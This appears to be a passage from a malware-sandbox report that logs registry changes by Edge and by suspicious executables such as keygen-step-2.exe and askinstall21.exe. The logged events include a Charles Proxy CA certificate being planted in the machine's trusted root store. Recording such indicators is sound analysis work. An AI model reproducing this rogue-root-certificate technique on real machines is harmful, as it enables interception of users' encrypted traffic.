"vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 4 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\5FF1348C80820F2A9 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\iplogger.org\NumberOfSubdoma = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 998267c856add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CRLs MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\CA MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\Md5FileCheck = 9fa75725855604a758366c6a1d9f0311 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf5c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95 intro.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 jg2_2qua.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C intro.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf5c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95 keygen-step-2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104610300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 askinstall21.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 19000000010000001000000018e847daffeaedafa0faaea36340ea790300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104612000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 askinstall21.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD askinstall21.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\SystemCertificates\CA\Certificates\33E4E80807204C2B6182A3A14B591ACD25B5F0DB intro.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\SystemCertificates\CA\Certificates\33E4E80807204C2B6182A3A14B591ACD25B5F0DB\Blob = 03000000010000001400000033e4e80807204c2b6182a3a14b591acd25b5f0db1400000001000000140000008d8c5ec454ad8ae177e99bf99b05e1b8018d61e1040000000100000010000000adab5c4df031fb9299f71ada7e18f6130f00000001000000300000008b612b2190a95b28b866b9be5d0b95f368c17534ab1da61a42dfb32766f9ae2908fe6bfd1669be140eddaf0d33e95235190000000100000010000000fc741b3b78cfb31e075744fe5d0eeb965c000000010000000400000000080000180000000100000010000000ea6089055218053dd01e37e1d806eedf4b0000000100000044000000300037004300450046003200460036003500340045003300450044003600300035003000460046004300390042003600450042003800340034003200350030005f00000020000000010000001706000030820613308203fba00302010202107d5b5126b476ba11db74160bbc530da7300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3138313130323030303030305a170d3330313233313233353935395a30818f310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f726431183016060355040a130f5365637469676f204c696d69746564313730350603550403132e5365637469676f2052534120446f6d61696e2056616c69646174696f6e205365637572652053657276657220434130820122300d06092a864886f70d01010105000382010f003082010a0282010100d67333d6d73c20d000d21745b8d63e07a23fc741ee3230c9b06cfdf49fcb12980f2d3f8d4d010c820f177f622ee9b84879fb16834eadd7322593b707bfb9503fa94cc3402ae939ffd981ca1f163241da8026b9237a87201ee3ff209a3c95446f8775069040b4329316091008233ed2dd870f6f5d51146a0a69c54f017269cfd3934c6d04a0a31b827eb19ab9edc59ec537789f9a0834fb562e58c4090e06645bbc37dcf19f2868a856b092a35c9fbb8898081b241dab3085aeafb02e9e7a9dc1c0421ce202f0eae04ad2ef900eb4c14016f06f85424a64f7a430a0febf2ea3275a8e8b58b8a